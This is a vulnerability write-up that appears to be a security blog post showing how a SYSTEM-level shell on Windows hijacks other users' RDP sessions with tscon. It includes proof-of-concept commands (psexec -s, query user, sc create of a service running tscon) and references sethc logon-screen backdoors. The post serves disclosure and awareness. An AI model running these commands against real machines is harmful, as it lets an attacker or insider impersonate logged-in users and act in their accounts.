0-day or Feature? Privilege Escalation / Session Hijacking All Windows versions
Blogpost in 20 seconds: Fun with sethc backdoored host 🙂 somewhere in the internet:
Recently i’ve played with sethc/utilman logon screen backdoors, and almost everytime i used just command line.
Occasionally i’ve looked at Users tab in Task Manager (taskmgr.exe), and clicked connect button, and surprisingly i’ve got connected to selected user’s session.
When i checked it again with local admin rights, it failed by asking user’s password.
Why and how that happened? Let’s dig deeper.
Related to Microsoft documentation:
we can see couple important remarks:
You must have Full Control access permission or Connect special access permission to connect to another session.
The /dest:<SessionName> parameter allows you to connect the session of another user to a different session.
If you do not specify a password in the <Password> parameter, and the target session belongs to a user other than the current one, tscon fails (not really).
I’ve got it! Sticky Keys (cmd backdoor) at windows login screen runs with NT AUTHORITY/SYSTEM and have Full Control access permission, and can connect to EVERY user session without asking for a password.
A privileged user, which can gain command execution with NT AUTHORITY/SYSTEM rights can hijack any currently logged in user’s session, without any knowledge about his credentials.
Terminal Services session can be either in connected or disconnected state.
Some bank employee have access to billing system, and it’s credentials to login.
One day, he come to work, logging in to the billing system and start to work. At lunch time he will lock his workstation, and out to lunch.
Then, system administrator gets to employee’s workstation, and logs in with his administrator’s account.
According to the bank’s policy, administrator’s account should not have access to the billing system, but with couple of built-in commands in windows, this system administrator will hijack employee’s desktop which he leaved locked. From now, sysadmin can perform malicious actions in billing system as billing employee account.
There are huge amount of scenarios like this.
Furthermore, an attacker doesn’t need to use tools like metasploit, incognito, mimikatz etc, which is commonly used for user’s token manipulation and impersonating logged in users. Everything is done with built-in commands. Every admin can impersonate any logged in user either locally with physical access or remotely via Remote Desktops (see PoC).
Feature Vulnerability tested on:
Windows 2012 R2
Proof of Concept:
psexec -s \\localhost cmd
C:\Windows\system32>query user USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME administrator 1 Disc 1 3/12/2017 3:07 PM >localadmin rdp-tcp#55 2 Active . 3/12/2017 3:10 PM C:\Windows\system32>
2. Create service which will hijack user’s session:
C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55" [SC] CreateService SUCCESS
net setart sesshijack
Proof of Concept video:
Windows 7 via Task Manager:
Windows 7 via command line:
Windows 2012 R2 via service creation:
Update: If you still think that this don’t have high attack value, read a great writeup by Kevin Beaumont about this feature:
Update: RedSnarf has now support in RDP Hijacking https://www.youtube.com/watch?v=VrF8uXK_ePY